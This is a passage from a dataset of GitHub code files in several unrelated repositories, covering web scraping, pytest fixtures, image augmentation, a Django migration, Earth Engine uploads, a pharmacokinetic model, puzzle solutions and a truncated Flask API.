"usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 63, "usage_type": "call"}, {"api_name": "time.time", "line_number": 92, "usage_type": "call"}, {"api_name": "time.time", "line_number": 101, "usage_type": "call"}]} +{"seq_id": "41787567245", "text": "from __future__ import absolute_import, division, unicode_literals\n\nfrom scrapy.http import Request\n\nfrom .hayneedle import HayneedleProductSpider\n\n\nclass HayneedleShelfPagesSpider(HayneedleProductSpider):\n name = 'hayneedle_shelf_urls_products'\n allowed_domains = [\"www.hayneedle.com\"]\n\n def __init__(self, *args, **kwargs):\n kwargs.pop('quantity', None)\n self.current_page = 1\n self.num_pages = int(kwargs.pop('num_pages', 1))\n\n super(HayneedleShelfPagesSpider, self).__init__(\n *args,\n **kwargs)\n\n self.product_url = self.product_url.replace('\\'', '')\n\n def start_requests(self):\n yield Request(\n url=self.product_url,\n meta={'remaining': self.quantity, 'search_term': ''},\n dont_filter=True\n )\n\n def _scrape_next_results_page_link(self, response):\n if self.current_page >= self.num_pages:\n return\n self.current_page += 1\n return super(HayneedleShelfPagesSpider, self)._scrape_next_results_page_link(response)\n\n", "repo_name": "aprosdev/ecom-predictor", "sub_path": "product-ranking/product_ranking/spiders/hayneedle_shelf_pages.py", "file_name": "hayneedle_shelf_pages.py", "file_ext": "py", "file_size_in_byte": 1065, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "hayneedle.HayneedleProductSpider", "line_number": 8, "usage_type": "name"}, {"api_name": "scrapy.http.Request", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "28632404564", "text": "import pytest\n\nfrom httpx import AsyncClient\n\nfrom app import create_app\nfrom fastapi.testclient import TestClient\n\n@pytest.fixture\ndef app():\n yield create_app(\"test\")\n\n@pytest.fixture\ndef client(app):\n client = TestClient(app)\n yield client\n\n@pytest.fixture\nasync def async_client(app):\n async with AsyncClient(app=app, base_url=\"http://\") as client:\n yield client\n", "repo_name": "Shawydu/task", "sub_path": "server/app/test/fixtures.py", "file_name": "fixtures.py", "file_ext": "py", "file_size_in_byte": 387, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "app.create_app", "line_number": 10, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 8, "usage_type": "attribute"}, {"api_name": "fastapi.testclient.TestClient", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 12, "usage_type": "attribute"}, {"api_name": "httpx.AsyncClient", "line_number": 19, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 17, "usage_type": "attribute"}]} +{"seq_id": "72324618753", "text": "from typing import Optional\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n# 3.8 first try自己还记得Floyd's Cycle Detection Algo\nclass Solution:\n def detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n # use slow & fast pointers to check if there's a cycle\n if not head or not head.next:\n return\n slow, fast = head, head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n if slow == fast:\n break\n if not slow == fast:\n return\n # add another slow at the begining to find where the cycle begins\n slow2 = head\n while 
slow != slow2:\n slow = slow.next\n slow2 = slow2.next\n return slow", "repo_name": "deezeey/LC", "sub_path": "src/solutions/142_linked-list-cycle-ii.py", "file_name": "142_linked-list-cycle-ii.py", "file_ext": "py", "file_size_in_byte": 856, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Optional", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "13335380693", "text": "import numpy as np\nimport albumentations as A\nfrom albumentations.pytorch import ToTensorV2\n\n\nIMAGE_HEIGHT = 480\nIMAGE_WIDTH = 640\n\ndef train_transform():\n print(\"####################################\")\n print(\"Apply transformation on train dataset\")\n print(\"####################################\")\n transform = A.Compose(\n [\n A.Resize(height=IMAGE_HEIGHT, width=IMAGE_WIDTH),\n A.Rotate(limit=35, p=1.0),\n A.HorizontalFlip(p=0.5),\n A.VerticalFlip(p=0.1),\n A.Normalize(\n mean=[0.0, 0.0, 0.0],\n std=[1.0, 1.0, 1.0],\n max_pixel_value=255.0,\n ),\n ToTensorV2(),\n ],\n )\n\n return transform\n\n\ndef val_transform():\n print(\"####################################\")\n print(\"Apply transformation on valid dataset\")\n print(\"####################################\")\n transform = A.Compose(\n [\n A.Resize(height=IMAGE_HEIGHT, width=IMAGE_WIDTH),\n A.Normalize(\n mean=[0.0, 0.0, 0.0],\n std=[1.0, 1.0, 1.0],\n max_pixel_value=255.0,\n ),\n ToTensorV2(),\n ],\n )\n\n return transform\n\n", "repo_name": "spradier/pfe", "sub_path": "fisheyes/transformations.py", "file_name": "transformations.py", "file_ext": "py", "file_size_in_byte": 1228, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "albumentations.Compose", "line_number": 13, "usage_type": "call"}, {"api_name": "albumentations.Resize", "line_number": 15, "usage_type": "call"}, {"api_name": "albumentations.Rotate", "line_number": 16, "usage_type": "call"}, {"api_name": "albumentations.HorizontalFlip", "line_number": 17, "usage_type": "call"}, {"api_name": "albumentations.VerticalFlip", "line_number": 18, "usage_type": "call"}, {"api_name": "albumentations.Normalize", "line_number": 19, "usage_type": "call"}, {"api_name": "albumentations.pytorch.ToTensorV2", "line_number": 24, "usage_type": "call"}, {"api_name": "albumentations.Compose", "line_number": 35, "usage_type": "call"}, {"api_name": "albumentations.Resize", "line_number": 37, "usage_type": "call"}, {"api_name": "albumentations.Normalize", "line_number": 38, "usage_type": "call"}, {"api_name": "albumentations.pytorch.ToTensorV2", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "4783924558", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Association',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=128)),\n ('logotype', models.ImageField(upload_to=b'profile_images', blank=True)),\n ('url', models.URLField()),\n ('email', models.EmailField(max_length=75)),\n ('penyanumber', models.IntegerField(default=0)),\n ('adress', models.CharField(max_length=256)),\n ('city', models.CharField(max_length=128)),\n ('telephone', models.IntegerField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n", "repo_name": "erueloi/Assocr", 
"sub_path": "assocr/migrations/0001_initial.py", "file_name": "0001_initial.py", "file_ext": "py", "file_size_in_byte": 995, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.URLField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.EmailField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "691872285", "text": "# bbest@Benjamins-MacBook-Air ~ % /opt/homebrew/bin/python3\n\n# which pip # /opt/homebrew/bin/pip\n# pip3 install earthengine-api --upgrade\nimport ee\nfrom google.auth.transport.requests import AuthorizedSession\n\n# https://developers.google.com/earth-engine/Earth_Engine_asset_from_cloud_geotiff\n\nee.Authenticate() # or !earthengine authenticate --auth_mode=gcloud\nsession = AuthorizedSession(ee.data.get_persistent_credentials())\n\nee.Initialize()\nprint(ee.Image(\"NASA/NASADEM_HGT/001\").get(\"title\").getInfo())\n\n\n\n# old\n\nimport json\nfrom pprint import pprint\n\n# Request body as a dictionary.\nrequest = {\n 'type': 'IMAGE',\n 'gcs_location': {\n 'uris': ['gs://ee-docs-demos/COG_demo.tif']\n },\n 'properties': {\n 'source': 'https://code.earthengine.google.com/d541cf8b268b2f9d8f834c255698201d'\n },\n 'startTime': '2016-01-01T00:00:00.000000000Z',\n 'endTime': '2016-12-31T15:01:23.000000000Z',\n}\n\npprint(json.dumps(request))\n\n# Earth Engine enabled Cloud Project.\nproject_folder = 'your-project'\n# A folder (or ImageCollection) name and the new asset name.\nasset_id = 'cog-collection/your-cog-asset'\n\nurl = 'https://earthengine.googleapis.com/v1alpha/projects/{}/assets?assetId={}'\n\nresponse = session.post(\n url = url.format(project_folder, asset_id),\n data = 
json.dumps(request)\n)\n\npprint(json.loads(response.content))", "repo_name": "offshorewindhabitat/scripts", "sub_path": "gee_upload.py", "file_name": "gee_upload.py", "file_ext": "py", "file_size_in_byte": 1328, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "ee.Authenticate", "line_number": 10, "usage_type": "call"}, {"api_name": "google.auth.transport.requests.AuthorizedSession", "line_number": 11, "usage_type": "call"}, {"api_name": "ee.data.get_persistent_credentials", "line_number": 11, "usage_type": "call"}, {"api_name": "ee.data", "line_number": 11, "usage_type": "attribute"}, {"api_name": "ee.Initialize", "line_number": 13, "usage_type": "call"}, {"api_name": "ee.Image", "line_number": 14, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 36, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 36, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 50, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "31446184915", "text": "# %% imports\nimport json\n\nimport pytest\nfrom language.lexeme_decoder import LexemeDecoder\nfrom mongomock import MongoClient\nfrom storage.language_datastore import LanguageDatastore\n\n# constants\nLANGUAGE = \"polish\"\n\n\n# %% pytest fixtures\n# https://stackoverflow.com/questions/22627659/run-code-before-and-after-each-test-in-py-test, https://docs.pytest.org/en/6.2.x/fixture.html\n@pytest.fixture(autouse=True)\ndef language_datastore():\n \"\"\"\n Establish a connection to the mongodb database\n \"\"\"\n ds_client = MongoClient()\n test_language_datastore = LanguageDatastore(ds_client, LANGUAGE)\n\n # run test\n yield test_language_datastore\n\n # cleanup\n test_language_datastore.lexicon_connector.collection.drop({})\n test_language_datastore.inflections_connector.collection.drop({})\n\n\n# %% tests\n# push and get\ndef test_add_and_get_lexeme(language_datastore):\n json_str = open('tests/storage/data/noun_czerwony.json').read()\n lexeme = json.loads(json_str, cls=LexemeDecoder)\n language_datastore.add_lexeme(lexeme)\n returned_lexeme = language_datastore.get_lexeme_from_form(\n form=lexeme.inflections['S']['I'], pos=\"NOUN\")\n\n assert returned_lexeme\n\n\ndef test_get_lexeme_none(language_datastore):\n noun_str = open('tests/storage/data/noun_czerwony.json').read()\n noun = json.loads(noun_str, cls=LexemeDecoder)\n adj_str = open('tests/storage/data/adjective_czerwony.json').read()\n adj = json.loads(adj_str, cls=LexemeDecoder)\n\n language_datastore.add_lexeme(noun)\n language_datastore.add_lexeme(adj)\n\n assert language_datastore.get_lexeme_from_form(\n form='niebieski', pos=\"ADJECTIVE\") == None\n\n\ndef test_get_lexeme_wrong_pos_none(language_datastore):\n noun_str = open('tests/storage/data/noun_czerwony.json').read()\n noun = json.loads(noun_str, cls=LexemeDecoder)\n adj_str = open('tests/storage/data/adjective_czerwony.json').read()\n adj = json.loads(adj_str, cls=LexemeDecoder)\n\n language_datastore.add_lexeme(noun)\n language_datastore.add_lexeme(adj)\n\n assert language_datastore.get_lexeme_from_form(\n form='czerwony', pos=\"ADVERB\") == None\n\n\ndef test_add_and_get_lexemes(language_datastore):\n noun_str = open('tests/storage/data/noun_czerwony.json').read()\n noun = json.loads(noun_str, cls=LexemeDecoder)\n adj_str = open('tests/storage/data/adjective_czerwony.json').read()\n 
adj = json.loads(adj_str, cls=LexemeDecoder)\n\n language_datastore.add_lexeme(noun)\n language_datastore.add_lexeme(adj)\n returned_lexemes = language_datastore.get_lexemes_from_form(\n form='czerwony')\n\n assert returned_lexemes\n\n\ndef test_get_lexemes_none(language_datastore):\n noun_str = open('tests/storage/data/noun_czerwony.json').read()\n noun = json.loads(noun_str, cls=LexemeDecoder)\n adj_str = open('tests/storage/data/adjective_czerwony.json').read()\n adj = json.loads(adj_str, cls=LexemeDecoder)\n\n language_datastore.add_lexeme(noun)\n language_datastore.add_lexeme(adj)\n\n assert language_datastore.get_lexemes_from_form(form='niebieski') == {}\n\n\ndef test_get_lexemes_wrong_pos_none(language_datastore):\n noun_str = open('tests/storage/data/noun_czerwony.json').read()\n noun = json.loads(noun_str, cls=LexemeDecoder)\n adj_str = open('tests/storage/data/adjective_czerwony.json').read()\n adj = json.loads(adj_str, cls=LexemeDecoder)\n\n language_datastore.add_lexeme(noun)\n language_datastore.add_lexeme(adj)\n\n assert language_datastore.get_lexemes_from_form(\n form='niebieski', poses=['VERB', 'ADVERB']) == {}\n\n\n# %% main\ndef main():\n pass\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "BieniekAlexander/ltt", "sub_path": "backend/tests/storage/language_datastore_test.py", "file_name": "language_datastore_test.py", "file_ext": "py", "file_size_in_byte": 3638, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "mongomock.MongoClient", "line_number": 20, "usage_type": "call"}, {"api_name": "storage.language_datastore.LanguageDatastore", "line_number": 21, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 15, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 35, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 35, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 45, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 45, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 47, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 47, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 58, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 58, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 60, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 60, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 71, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 71, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 73, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 73, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 85, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 85, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 87, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 87, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 97, "usage_type": "call"}, {"api_name": "language.lexeme_decoder.LexemeDecoder", "line_number": 97, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 99, "usage_type": "call"}, {"api_name": 
"language.lexeme_decoder.LexemeDecoder", "line_number": 99, "usage_type": "name"}]} +{"seq_id": "24434218534", "text": "from urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom bs4 import BeautifulSoup\ndef getTitle(url):\n # 尝试打开网址\n try:\n html = urlopen(url)\n # 打开失败,抛出错误\n except HTTPError as e:\n return None\n # 打开成功,但没有想要的字段,抛出错误\n try:\n bsObj = BeautifulSoup(html.read())\n title = bsObj.body.h1\n except AttributeError as e:\n return None \n return title\ntitle = getTitle(\"http://pythonscraping.com/pages/page1.html\")\nif title == None:\n print(\"title could not be found\")\nelse:\n print(title)\n ", "repo_name": "gledfish/Codes", "sub_path": "Language/PythonCodes/Python-Scratch/book-data-gathering/chapter-2/error_handle.py", "file_name": "error_handle.py", "file_ext": "py", "file_size_in_byte": 621, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "urllib.request.urlopen", "line_number": 7, "usage_type": "call"}, {"api_name": "urllib.error.HTTPError", "line_number": 9, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "9233138693", "text": "# The code allows you to visualize how the drug concentrations in the\n# central compartment (q_c) and the peripheral compartment (q_p1) \n# change over time for different sets of model parameters. \n# It provides a comparison between the two models.\n\n\n# import the necessary libraries, including matplotlib.pylab for plotting, numpy for numerical operations, \n# and scipy.integrate for solving differential equations.\nimport matplotlib.pylab as plt\nimport numpy as np\nimport scipy.integrate\n\n\n# define a function dose(t, X) that represents the drug dose as a function of time. \n# It's a simple function that returns a constant dose X at any given time t.\ndef dose(t, X):\n return X\n\n# define the right-hand side (rhs) function\n# rhs(t, y, Q_p1, V_c, V_p1, CL, X)\n# This function represents the pharmacokinetic model, with q_c and q_p1 as state variables. \n# It calculates the rate of change of these variables based on the given parameters and drug dose function.\ndef rhs(t, y, Q_p1, V_c, V_p1, CL, X):\n q_c, q_p1 = y\n transition = Q_p1 * (q_c / V_c - q_p1 / V_p1)\n dqc_dt = dose(t, X) - q_c / V_c * CL - transition\n dqp1_dt = transition\n return [dqc_dt, dqp1_dt]\n\n# define two sets of model parameters, model1_args and model2_args\n# each represent different model scenarios with various parameter values.\nmodel1_args = {\n 'name': 'model1',\n 'Q_p1': 1.0,\n 'V_c': 1.0,\n 'V_p1': 1.0,\n 'CL': 1.0,\n 'X': 1.0,\n}\n\nmodel2_args = {\n 'name': 'model2',\n 'Q_p1': 2.0,\n 'V_c': 1.0,\n 'V_p1': 1.0,\n 'CL': 1.0,\n 'X': 1.0,\n}\n\n# time array t_eval to evaluate the model over a range of time points.\nt_eval = np.linspace(0, 1, 1000)\n\n#initialize the initial conditions for the state variables in y0.\ny0 = np.array([0.0, 0.0])\n\n# create a Matplotlib figure for plotting.\nfig = plt.figure()\n\n# Loop through both models (model1_args and model2_args\n# to solve the pharmacokinetic model for each. 
\n# For each model, you set the model parameters,solve the differential equations\n# using scipy.integrate.solve_ivp, and then plot the results for both q_c and q_p1 over time.\nfor model in [model1_args, model2_args]:\n args = [\n model['Q_p1'], model['V_c'], model['V_p1'], model['CL'], model['X']\n ]\n sol = scipy.integrate.solve_ivp(\n fun=lambda t, y: rhs(t, y, *args),\n t_span=[t_eval[0], t_eval[-1]],\n y0=y0, t_eval=t_eval\n )\n plt.plot(sol.t, sol.y[0, :], label=model['name'] + '- q_c')\n plt.plot(sol.t, sol.y[1, :], label=model['name'] + '- q_p1')\n\n# Add labels, legends, and axis labels to the plot.\nplt.legend()\nplt.ylabel('drug mass [ng]')\nplt.xlabel('time [h]')\nplt.show()\n", "repo_name": "AndrewNicoll1/software-pk", "sub_path": "prototype.py", "file_name": "prototype.py", "file_ext": "py", "file_size_in_byte": 2649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.linspace", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pylab.figure", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 57, "usage_type": "name"}, {"api_name": "scipy.integrate.integrate.solve_ivp", "line_number": 67, "usage_type": "call"}, {"api_name": "scipy.integrate.integrate", "line_number": 67, "usage_type": "attribute"}, {"api_name": "scipy.integrate", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pylab.plot", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pylab.legend", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pylab.ylabel", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pylab.xlabel", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pylab.show", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 79, "usage_type": "name"}]} +{"seq_id": "29399159606", "text": "\nimport logging\n\nDEBUG = True\n\nDB_SPOTLIGHT_URI = 'mysql://root:123@127.0.0.1:3306/db_operator'\nDB_POOL_RECYCLE_TIMEOUT = 10\nDB_POOL_SIZE = 5\nDB_DEBUG = False\n\nLOGGING_PATH = '/home/brian/temp/log/Operator'\nLOGGING_FILE = 'Operator.log'\nLOGGING_LEVEL = logging.ERROR\n", "repo_name": "brianzhang/OperatorCenter", "sub_path": "OperatorCore/applications/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 267, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.ERROR", "line_number": 13, "usage_type": "attribute"}]} +{"seq_id": "1503897199", "text": "import triangle.array_util as util\n\nimport aztec.binary_layers_catalan as blc\n\n\n\nrow_dict = dict()\nrow_dict[1] =[[k, ] for k in range(0, 2)]\nrow_dict[0] = [(0,), ]\n\n\ndef get_row(size):\n if size not in row_dict:\n row_list = []\n prev_list = get_row(size-1)\n for idx in range(size+1):\n for prev in prev_list:\n if idx == 0 or idx > max(prev):\n row_list.append([idx,] + 
prev)\n\n row_dict[size] = row_list\n\n return row_dict[size]\n\n\ntt_dict = dict()\ntt_dict[1] = [[[k, ],] for k in range(0,2)]\n\ndef get_tile_triangle(size):\n if not size in tt_dict:\n new_list = []\n prev_list = get_tile_triangle(size-1)\n row_list = get_row(size)\n\n for row in row_list:\n for prev in prev_list:\n is_compatible = True\n\n if sum(prev[0]) > 0 and sum(row) == 0:\n is_compatible = False\n else:\n for idx in range(len(prev)):\n if row[idx] == 0:\n if prev[0][idx] > 0 and not any( x >= prev[0][idx] for x in row[idx:len(row)]):\n is_compatible = False\n break\n elif prev[0][idx] >= row[idx]:\n is_compatible = False\n break\n\n if is_compatible:\n new_list.append([row] + prev)\n\n tt_dict[size] = new_list\n\n return tt_dict[size]\n\n\ndef replace_zeros_list(tri_list):\n return [ replace_zeros(triangle) for triangle in tri_list]\n\ndef replace_zeros(triangle):\n new_triangle = [[x for x in row] for row in triangle]\n\n for row in new_triangle:\n current_max = 0\n for idx in reversed(range(len(row))):\n if row[idx] > current_max:\n current_max = row[idx]\n elif row[idx] == 0 and current_max > 0:\n row[idx] = current_max\n\n return new_triangle\n\n\nif __name__ == '__main__':\n\n size = 3\n\n tri_list = get_tile_triangle(size)\n\n #blc_list = blc.get_binary_layers(size)\n\n print('xxxxxxxxxxxxxxxx')\n\n for t in tri_list:\n util.print_array(t)\n util.print_array(replace_zeros(t))\n print('===============')\n\n\n # for b in blc_list:\n # if not b in tri_list:\n # util.print_array(b)\n\n print(len(tri_list))\n\n util.print_block_totals(tri_list)\n\n my_tri_lists = [get_tile_triangle(2), get_tile_triangle(3), get_tile_triangle(4)]\n my_totals = [util.print_block_totals(x) for x in my_tri_lists]\n print('block totals=', my_totals)\n\n\n t = tri_list[50]\n max_t = tri_list[-1]\n\n util.get_mma_block_pyramid(t, max_t)", "repo_name": "mathbeveridge/asm", "sub_path": "aztec/build_tile_triangle.py", "file_name": "build_tile_triangle.py", "file_ext": "py", "file_size_in_byte": 2730, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "triangle.array_util", "line_number": 60, "usage_type": "argument"}, {"api_name": "triangle.array_util", "line_number": 63, "usage_type": "name"}, {"api_name": "triangle.array_util.print_array", "line_number": 87, "usage_type": "call"}, {"api_name": "triangle.array_util", "line_number": 87, "usage_type": "name"}, {"api_name": "triangle.array_util.print_array", "line_number": 88, "usage_type": "call"}, {"api_name": "triangle.array_util", "line_number": 88, "usage_type": "name"}, {"api_name": "triangle.array_util.print_block_totals", "line_number": 98, "usage_type": "call"}, {"api_name": "triangle.array_util", "line_number": 98, "usage_type": "name"}, {"api_name": "triangle.array_util.print_block_totals", "line_number": 101, "usage_type": "call"}, {"api_name": "triangle.array_util", "line_number": 101, "usage_type": "name"}, {"api_name": "triangle.array_util.get_mma_block_pyramid", "line_number": 108, "usage_type": "call"}, {"api_name": "triangle.array_util", "line_number": 108, "usage_type": "name"}]} +{"seq_id": "23607767141", "text": "#!/usr/bin/env python2.6\n\nimport sys, math\nimport fractions\nfrom itertools import repeat, count, cycle, ifilter, ifilterfalse, \\\n imap, starmap, tee, izip, product, combinations, \\\n permutations\nfrom collections import defaultdict\nfrom operator import itemgetter\n\n\ndef mapInstance( foo, istream ):\n N, M = map( int, 
istream.readline().split() )\n idata = []\n for i in xrange(N):\n idata.append( istream.readline().strip() )\n idata2 = []\n for i in xrange(M):\n idata2.append( istream.readline().strip() )\n return foo( idata, idata2 )\n \ndef mapInput( foo, preproc = None, istream = sys.stdin, ostream = sys.stdout ):\n N = map( int, istream.readline().split() )[0]\n if preproc:\n pass\n odata = starmap( mapInstance, repeat( ( foo, istream ), N ) )\n for i, d in enumerate( odata ):\n print >>sys.stderr, \"Case #%d\" % ( i+1 )\n print >>ostream, \"Case #%d: %s\" % ( i+1, d )\n \nclass showfunction:\n def __init__( self, foo ):\n self.foo = foo\n \n def __call__( self, *args ):\n result = self.foo( *args )\n print >>sys.stderr, args, result\n return result\n\nclass cachedfunction:\n def __init__( self, foo ):\n self.foo = foo\n self.cache = {}\n \n def __call__( self, *args ):\n if args in self.cache:\n return self.cache[args]\n else:\n result = self.cache[args] = self.foo( *args )\n return result\n\nclass FS:\n def __init__(self, paths):\n self.root = {}\n self.inserts(paths)\n\n def splitPath(self, p):\n return p.strip('/').split('/')\n\n def inserts(self, paths):\n paths.sort()\n cnt = 0\n for p in paths:\n cnt += self.insert(p)\n return cnt\n\n def insert(self, path):\n path = self.splitPath(path)\n cnt = 0\n n = self.root\n for d in path:\n if d not in n:\n n[d] = {}\n cnt += 1\n n = n[d]\n return cnt\n\n\ndef solve( old, new ):\n fs = FS(old)\n return str(fs.inserts(new))\n \ndef main( args ):\n mapInput( solve )\n\nif __name__ == \"__main__\":\n main( sys.argv )\n", "repo_name": "dr-dos-ok/Code_Jam_Webscraper", "sub_path": "solutions_python/Problem_59/129.py", "file_name": "129.py", "file_ext": "py", "file_size_in_byte": 2217, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.stdin", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 22, "usage_type": "attribute"}, {"api_name": "itertools.starmap", "line_number": 26, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 28, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 87, "usage_type": "attribute"}]} +{"seq_id": "16104243358", "text": "from flask import jsonify, make_response, request, current_app\nfrom flask_restplus import Resource, fields, reqparse\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nfrom math import ceil\n\nfrom app.database.models import User\nfrom app.database.db import db\nfrom app.api.roles import ROLES\nfrom app.api.access_control import role_required, auth_required\nfrom app.api.filtering import filter_users, filter_delete\nfrom app.api.errors import error_response\nfrom app.api import users_ns, api\n\nparser = reqparse.RequestParser()\nparser.add_argument('Authorization', location='headers', help='Bearer token', required=True)\nparser.add_argument('page', type=int, required=False, location='args', help=1)\nparser.add_argument('per_page', type=int, required=False, location='args', help=10)\nparser.add_argument('filter', type=str, required=False, help='Supported operators >,<,=,!=,AND,OR', location='args')\n\ntoken_parser = reqparse.RequestParser()\ntoken_parser.add_argument('Authorization', location='headers', help='Bearer token', required=True)\n\ndel_parser = 
